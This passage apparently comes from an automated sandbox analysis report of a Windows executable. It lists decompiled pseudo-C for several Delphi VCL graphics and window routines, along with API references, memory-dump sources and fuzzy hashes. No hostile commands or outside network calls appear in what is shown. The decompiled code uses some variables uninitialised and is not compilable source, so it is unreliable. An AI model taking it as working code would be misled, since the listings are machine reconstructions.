                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                        • String ID:
                                                                        • API String ID: 1221726059-0
                                                                        • Opcode ID: e98d72b155561e039d069f85c1537096a3a31416e4cc9bde9117b13ecef65495
                                                                        • Instruction ID: 8d8527e8f488405aff4f669bab89b73bcf596afed52ccf13c67bd5abc98d74bf
                                                                        • Opcode Fuzzy Hash: e98d72b155561e039d069f85c1537096a3a31416e4cc9bde9117b13ecef65495
                                                                        • Instruction Fuzzy Hash: 7B118275B042147FDB10EBA9CC41F5EBBFCEB4C700F51846AB918E7291D6789900C768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004333D8, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004333D8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x47a8ac; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x47a8ac; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x47a8ac; // 0x0
				SetPropA(_a4,  *0x496b7a & 0x0000ffff, _t27);
				_t31 =  *0x47a8ac; // 0x0
				SetPropA(_a4,  *0x496b78 & 0x0000ffff, _t31);
				_t35 =  *0x47a8ac; // 0x0
				 *0x47a8ac = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                        0x004333dd
                                                                        0x004333e0
                                                                        0x004333e8
                                                                        0x004333ee
                                                                        0x00433400
                                                                        0x00433415
                                                                        0x00433430
                                                                        0x00433430
                                                                        0x00433435
                                                                        0x00433447
                                                                        0x0043344c
                                                                        0x0043345e
                                                                        0x0043346f
                                                                        0x00433474
                                                                        0x00433484
                                                                        0x0043348c

                                                                        APIs
                                                                        • SetWindowLongA.USER32 ref: 00433400
                                                                        • GetWindowLongA.USER32 ref: 0043340B
                                                                        • GetWindowLongA.USER32 ref: 0043341D
                                                                        • SetWindowLongA.USER32 ref: 00433430
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 00433447
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 0043345E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LongWindow$Prop
                                                                        • String ID:
                                                                        • API String ID: 3887896539-0
                                                                        • Opcode ID: a2b974559dbee0a756eb0a72755d0049ae3fa082466c9d19223a96232c7cdb99
                                                                        • Instruction ID: 2f816502963edffd2a2e0b87a7de9d57cd36cbe0b36d5e0b22d0fd463ea8592c
                                                                        • Opcode Fuzzy Hash: a2b974559dbee0a756eb0a72755d0049ae3fa082466c9d19223a96232c7cdb99
                                                                        • Instruction Fuzzy Hash: EF112CB5504104BFDB10EF9DDC84E9A37E8AF08320F118222B918CB3A1D738E9508B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421218, Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00421218(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029BC(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00421180(_t34) == 0) {
						E00421010( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}













                                                                        0x00421221
                                                                        0x00421223
                                                                        0x00421225
                                                                        0x0042122d
                                                                        0x00421267
                                                                        0x00421275
                                                                        0x0042122f
                                                                        0x00421236
                                                                        0x0042123a
                                                                        0x00421253
                                                                        0x0042125a
                                                                        0x00421260
                                                                        0x00421260
                                                                        0x00421280
                                                                        0x00421288
                                                                        0x0042129e
                                                                        0x0042129e
                                                                        0x004212ab
                                                                        0x004212ab
                                                                        0x004212b8

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00421231
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042123A
                                                                        • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424C7F,?,?,?,?,0042378B), ref: 0042124E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042125A
                                                                        • DeleteDC.GDI32(00000000), ref: 00421260
                                                                        • CreatePalette.GDI32 ref: 004212A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                        • String ID:
                                                                        • API String ID: 2515223848-0
                                                                        • Opcode ID: 81d7ffad105dc184113cb8e1208da88902fd7a3f35f1a0a900b9a518896e1975
                                                                        • Instruction ID: 6233c2232071ce45a9a25d117bab58e91d046375a4003aa02fa61980a1f905b8
                                                                        • Opcode Fuzzy Hash: 81d7ffad105dc184113cb8e1208da88902fd7a3f35f1a0a900b9a518896e1975
                                                                        • Instruction Fuzzy Hash: 3F01D66170832062E610B76AAC43F6B72F8CFC0758F05C82FB585E72D1E67C8844836A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045BE40, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045BE40(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043CC2C(__eax), 0);
				InvalidateRect(E0043CC2C(_t29), 0, 0xffffffff);
				GetClientRect(E0043CC2C(_t29), _t30);
				_t18 = E0043CC2C( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043CC2C(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}







                                                                        0x0045be44
                                                                        0x0045be50
                                                                        0x0045be61
                                                                        0x0045be6f
                                                                        0x0045be81
                                                                        0x0045be8f
                                                                        0x0045bea1
                                                                        0x0045bec2

                                                                        APIs
                                                                        • ValidateRect.USER32(00000000,00000000,0045C694), ref: 0045BE50
                                                                        • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BE61
                                                                        • GetClientRect.USER32 ref: 0045BE6F
                                                                        • MapWindowPoints.USER32 ref: 0045BE8F
                                                                        • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BEA1
                                                                        • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045BEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                        • String ID:
                                                                        • API String ID: 2846033224-0
                                                                        • Opcode ID: bc3c1dfb15d199b855847963ceb94e7d1f8871a39bc5f5e14a9b6d9568782abb
                                                                        • Instruction ID: ea2dbad194b2ebc7582b08bb91a9dba736990e92a686d62ef286bf12ff39715e
                                                                        • Opcode Fuzzy Hash: bc3c1dfb15d199b855847963ceb94e7d1f8871a39bc5f5e14a9b6d9568782abb
                                                                        • Instruction Fuzzy Hash: E1F0C960A5430066EA00BA7A8DC7F4B768D9B0C718F002D7A7518FB2C3C93DEC05476A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004208FC, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004208FC(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041FC84( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041FC84( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041FD64( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                                                        0x004208fd
                                                                        0x00420908
                                                                        0x0042091a
                                                                        0x00420929
                                                                        0x00420963
                                                                        0x00420974
                                                                        0x0042092b
                                                                        0x0042093d
                                                                        0x0042094e
                                                                        0x0042094e

                                                                        APIs
                                                                          • Part of subcall function 0041FC84: CreateBrushIndirect.GDI32(?), ref: 0041FD2E
                                                                        • UnrealizeObject.GDI32(00000000), ref: 00420908
                                                                        • SelectObject.GDI32(?,00000000), ref: 0042091A
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0042093D
                                                                        • SetBkMode.GDI32(?,00000002), ref: 00420948
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420963
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0042096E
                                                                          • Part of subcall function 0041EFA4: GetSysColor.USER32(?), ref: 0041EFAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                        • String ID:
                                                                        • API String ID: 3527656728-0
                                                                        • Opcode ID: 2e9304bb39e578ed7576aeaf7fa11be73435d8f21738a1c2794cb36238e8a360
                                                                        • Instruction ID: 33fc0b801b1a1cbcb5887307af3aaa8169cec276aa49de2580deb539fc8c3729
                                                                        • Opcode Fuzzy Hash: 2e9304bb39e578ed7576aeaf7fa11be73435d8f21738a1c2794cb36238e8a360
                                                                        • Instruction Fuzzy Hash: DCF0BBB52041009BEF04FFBADAC794B67A8AF44309700806ABD89DF197CA29D8659739
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00471C3C, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E00471C3C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t46;
				int _t56;
				void* _t68;
				void* _t71;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr _t102;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_v28 = 0;
				_t110 = __edx;
				_t85 = __eax;
				_push(_t113);
				_push(0x471e1a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xffffffe8;
				if(__edx == 0) {
					L8:
					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
						L12:
						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
							_t92 =  *0x46af2c; // 0x46af78
							if(E00403768(_t110, _t92) == 0) {
								_t93 =  *0x46ab14; // 0x46ab60
								if(E00403768(_t110, _t93) == 0) {
									_t94 =  *0x46c2d8; // 0x46c324
									if(E00403768(_t110, _t94) == 0 && E00471C0C(E00403524(_t110), "TDBEdit") == 0 && E00471C0C(E00403524(_t110), "TDBMemo") == 0) {
										_t46 = E0043CF30(_t85);
										_t132 = _t46;
										if(_t46 != 0) {
											E00471E48(_t85, _t110, _t132);
											_t56 = E0043CC2C(_t110);
											SendMessageA(E0043CC2C(_t85), 0x469, _t56, 0);
										}
										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
										_t97 =  *0x429ec4; // 0x429f10
										if(E00403768(_t110, _t97) != 0) {
											E00408720( *((short*)(_t85 + 0x21c)),  &_v28);
											E004365DC(_t110, _t85, _v28, _t110);
										}
									}
								}
							}
						}
						_pop(_t91);
						 *[fs:eax] = _t91;
						_push(0x471e21);
						return E00404348( &_v28);
					}
					if(E0043CF30(_t85) != 0) {
						SendMessageA(E0043CC2C(_t85), 0x469, 0, 0);
					}
					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
					goto L12;
				}
				_t68 = E00439AB4( *((intOrPtr*)(__eax + 0x30))) - 1;
				if(_t68 >= 0) {
					_v8 = _t68 + 1;
					_t108 = 0;
					do {
						_t71 = E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108);
						_t102 =  *0x46af2c; // 0x46af78
						if(E00403768(_t71, _t102) != 0 && _t85 != E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
							_v24 =  *((intOrPtr*)(_t110 + 8));
							_v20 = 0xb;
							_v16 =  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
							_v12 = 0xb;
							_t89 =  *0x495c08; // 0x468cbc
							E0040A274(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
							E00403DA8();
						}
						_t108 = _t108 + 1;
						_t16 =  &_v8;
						 *_t16 = _v8 - 1;
					} while ( *_t16 != 0);
				}
			}
























                                                                        0x00471c47
                                                                        0x00471c4a
                                                                        0x00471c4c
                                                                        0x00471c50
                                                                        0x00471c51
                                                                        0x00471c56
                                                                        0x00471c59
                                                                        0x00471c5e
                                                                        0x00471cf5
                                                                        0x00471cfc
                                                                        0x00471d27
                                                                        0x00471d29
                                                                        0x00471d3d
                                                                        0x00471d4a
                                                                        0x00471d52
                                                                        0x00471d5f
                                                                        0x00471d67
                                                                        0x00471d74
                                                                        0x00471da6
                                                                        0x00471dab
                                                                        0x00471dad
                                                                        0x00471db3
                                                                        0x00471dbc
                                                                        0x00471dcf
                                                                        0x00471dcf
                                                                        0x00471dd4
                                                                        0x00471ddc
                                                                        0x00471de9
                                                                        0x00471df5
                                                                        0x00471dff
                                                                        0x00471dff
                                                                        0x00471de9
                                                                        0x00471d74
                                                                        0x00471d5f
                                                                        0x00471d4a
                                                                        0x00471e06
                                                                        0x00471e09
                                                                        0x00471e0c
                                                                        0x00471e19
                                                                        0x00471e19
                                                                        0x00471d07
                                                                        0x00471d1a
                                                                        0x00471d1a
                                                                        0x00471d21
                                                                        0x00000000
                                                                        0x00471d21
                                                                        0x00471c6c
                                                                        0x00471c6f
                                                                        0x00471c76
                                                                        0x00471c79
                                                                        0x00471c7b
                                                                        0x00471c80
                                                                        0x00471c85
                                                                        0x00471c92
                                                                        0x00471cb7
                                                                        0x00471cba
                                                                        0x00471ccb
                                                                        0x00471cce
                                                                        0x00471cd8
                                                                        0x00471ce5
                                                                        0x00471cea
                                                                        0x00471cea
                                                                        0x00471cef
                                                                        0x00471cf0
                                                                        0x00471cf0
                                                                        0x00471cf0
                                                                        0x00471c7b

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: x@$TDBEdit$TDBMemo
                                                                        • API String ID: 3850602802-3284963328
                                                                        • Opcode ID: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction ID: d5e860475c8fb5d570ea0d8d9322d81bf70e85d28bf0087e7759142a1a5dafb3
                                                                        • Opcode Fuzzy Hash: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction Fuzzy Hash: D34190707002405BCB10FF6EC98269A77A9AF44709F60957BEC48AB3A6C678DD05CB9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00439D3C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E00439D3C(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x439ec7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E004333D8 != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E004333D8;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B330(_t83, _t84, _t98, _t100);
						}
					}
					 *0x47a8ac = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B330(_t83, _t85, _t98, _t100);
					}
					E00408E50( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043CF3C(_t100);
					E00437760(_t100, E0041F478( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037D8(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x439ece);
					return E00404348( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x495b10; // 0x41d584
						E00406548(_t75,  &_v196);
						_t84 = _v196;
						E0040A1B8(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403DA8();
					} else {
						_t97 =  *0x4323f0; // 0x43243c
						if(E00403768(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043CC2C(_t83);
					}
					goto L7;
				}
			}




















                                                                        0x00439d3c
                                                                        0x00439d3c
                                                                        0x00439d45
                                                                        0x00439d49
                                                                        0x00439d4f
                                                                        0x00439d53
                                                                        0x00439d54
                                                                        0x00439d59
                                                                        0x00439d5c
                                                                        0x00439d67
                                                                        0x00439d69
                                                                        0x00439d73
                                                                        0x00439de8
                                                                        0x00439deb
                                                                        0x00439e00
                                                                        0x00439e08
                                                                        0x00439e0a
                                                                        0x00439e0d
                                                                        0x00439e1e
                                                                        0x00439e28
                                                                        0x00439e28
                                                                        0x00439e2d
                                                                        0x00439e37
                                                                        0x00439e46
                                                                        0x00439e48
                                                                        0x00439e48
                                                                        0x00439e46
                                                                        0x00439e4d
                                                                        0x00439e5b
                                                                        0x00439e5d
                                                                        0x00439e6a
                                                                        0x00439e6c
                                                                        0x00439e6c
                                                                        0x00439e74
                                                                        0x00439e7b
                                                                        0x00439e80
                                                                        0x00439e98
                                                                        0x00439e9d
                                                                        0x00439ea1
                                                                        0x00439ea9
                                                                        0x00439ea9
                                                                        0x00439eb0
                                                                        0x00439eb3
                                                                        0x00439eb6
                                                                        0x00439ec6
                                                                        0x00439d7e
                                                                        0x00439d7e
                                                                        0x00439d83
                                                                        0x00439da8
                                                                        0x00439dab
                                                                        0x00439db1
                                                                        0x00439dc7
                                                                        0x00439dcc
                                                                        0x00439dd1
                                                                        0x00439dde
                                                                        0x00439de3
                                                                        0x00439d8b
                                                                        0x00439d8d
                                                                        0x00439d9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00439da3
                                                                        0x00439da3
                                                                        0x00000000
                                                                        0x00439d83

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Class$InfoRegisterUnregister
                                                                        • String ID: <$C$@
                                                                        • API String ID: 3749476976-2018183516
                                                                        • Opcode ID: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction ID: 2c6ec2fd4a1584ed8ef345fd1b634a2f873c5482398d3f71bf8bca164ddd66ba
                                                                        • Opcode Fuzzy Hash: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction Fuzzy Hash: 4D417E71A003189BDB20EB65CC42BDE77E9AF48304F4054BAE849E7391DB78AD45CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409F40, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409F40(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x496714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F34(_t73);
					L4:
					E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t89) + 1);
					_t74 = 0x40a0c0;
					_t86 = 0x40a0c0;
					_t83 =  *0x4077d4; // 0x407820
					if(E00403768(_t87, _t83) != 0) {
						_t74 = E004047F8( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408BF8(_t74, 0x40a0c0);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x40a0c4;
						}
					}
					_t51 =  *0x495c1c; // 0x407594
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x496714; // 0x400000
					LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
					E0040352C( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408BF8(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}
































                                                                        0x00409f4c
                                                                        0x00409f4f
                                                                        0x00409f51
                                                                        0x00409f5d
                                                                        0x00409f6c
                                                                        0x00409f8a
                                                                        0x00409f96
                                                                        0x00409f9c
                                                                        0x00409fa8
                                                                        0x00409fb6
                                                                        0x00409fd1
                                                                        0x00409fd6
                                                                        0x00409fdb
                                                                        0x00409fe2
                                                                        0x00409fef
                                                                        0x00409ff9
                                                                        0x00409ffd
                                                                        0x0040a004
                                                                        0x0040a00d
                                                                        0x0040a00d
                                                                        0x0040a004
                                                                        0x0040a01e
                                                                        0x0040a023
                                                                        0x0040a027
                                                                        0x0040a032
                                                                        0x0040a03f
                                                                        0x0040a04a
                                                                        0x0040a050
                                                                        0x0040a05d
                                                                        0x0040a063
                                                                        0x0040a06d
                                                                        0x0040a073
                                                                        0x0040a07a
                                                                        0x0040a080
                                                                        0x0040a087
                                                                        0x0040a08d
                                                                        0x0040a0a9
                                                                        0x0040a0bc
                                                                        0x0040a0bc
                                                                        0x00409f81
                                                                        0x00409f86
                                                                        0x00409f88
                                                                        0x00409fad
                                                                        0x00409fad
                                                                        0x00409fb3
                                                                        0x00000000
                                                                        0x00409fb3
                                                                        0x00000000

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
